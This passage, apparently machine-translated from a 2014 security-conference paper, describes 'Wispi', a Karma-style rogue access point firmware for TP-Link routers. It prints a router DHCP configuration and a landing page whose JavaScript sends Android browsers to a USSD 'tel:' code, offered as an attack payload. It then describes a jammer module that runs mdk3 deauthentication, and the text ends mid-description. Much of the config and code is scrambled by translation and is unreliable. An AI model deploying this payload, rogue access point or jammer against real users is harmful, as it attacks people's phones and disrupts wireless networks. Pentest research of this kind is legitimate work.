Wispi (mini karma firmware) for various type TP-link router, ex: tl-wr703n, tl-mr3020, tl-mr3040, tl-mr3220V1/v2, tl-mr3240V1/V2

-------------------------------------------------- ----- / etc / config / dhcp --------------------------------------- ------------------ dnsmasq config option domainneeded 1 boguspriv option 1 option filterwin2k 0 # enable for dial on demand option localise_queries1 rebind_protection 1 # disable option if upstream RFC1918 addresses must serve option rebind_localhost 1 # enable for RBL checking and-similar services #list rebind_domain example.lan # whitelist RFC1918 responses for domains #option local '/ lan /' domain #option 'lan' expandhosts option 1 option nonegcache 0 authoritative option 1 option 1 option leasefile readethers' /tmp/dhcp.leases 'option resolvfile' /tmp/resolv.conf.auto '#list server' /mycompany.local/ '#option nonwildcard 1 br-lan interface #list #list notinterface lo #list bogusnxdomain' 'config dhcp lan lan interface option option option limits start 100 150 option leasetime 12h wan dhcp config 18. Wispi, Karma Mini Router for pentester - 17 - 2014 Idsecconf wan interface option ignore one config option 'domain' option name '#' option ip '' -------------- ----------------------------------------------- FILE end- --------------------------------------------------
Landing pages (/www/index.php) are in use in Wispi is the page that contains the payload USSD attack. Payload attack android default browser ≥ version 4.0.1 and execute USSD commands File dikandungnya.9 it contains:
<? Php?> <Html> <head> </ head> <body> <script type = "text / javascript"> var isMobile = {Android: function () {return navigator.userAgent.match (/ Android / i) ; }}; if (isMobile.Android ()) {document.location.href = "tel: *% 2306% 23"; } </ Script> 9 Read http://ezine.echo.or.id/issue29/005.txt 19. Wispi, Karma Mini Router for pentester - 18 - Idsecconf 2014 <center> <h1 style = 'font-size: 400%'> You've been Rick Rolled !!! </ h1> </ center> </ body > </ html>
-------------------------------------------------- END FILE --------------------------------
Figure 7. Proof of Concepts Spoofhost in the browser instead of android.
20. Wispi, Karma Mini Router for pentester - 19 - 2014 Idsecconf figure 8. Proof of Concepts Spoofhost on android brower vulnerable. !!! The default Wispi in a state of active Spoofhost so the router is finished in flashing. 3. Jammer Jammer is the development of features / modules of disruptor that the author presented in Idsecconf 2013.10 core idea is to run tools mdk3 by using the buttons. In Wispi control over the use of the jammer can be done in two options namely via the 'wps' on the router and can also via the web interface by clicking the button 'start'. In addition, a wireless interface to the jammer can also use an optional wireless usb (wlan1) Atheros chipset (such as. TP-link wn722 N, Alfa card AWUSH036NHA because in Wispi already installed package 'kmod-ath9k-htc'. Script jammer itself is in '/ usr / sbin / disruptor 'which runs deauth the whitelist option (exception list). Fill disruptor is:

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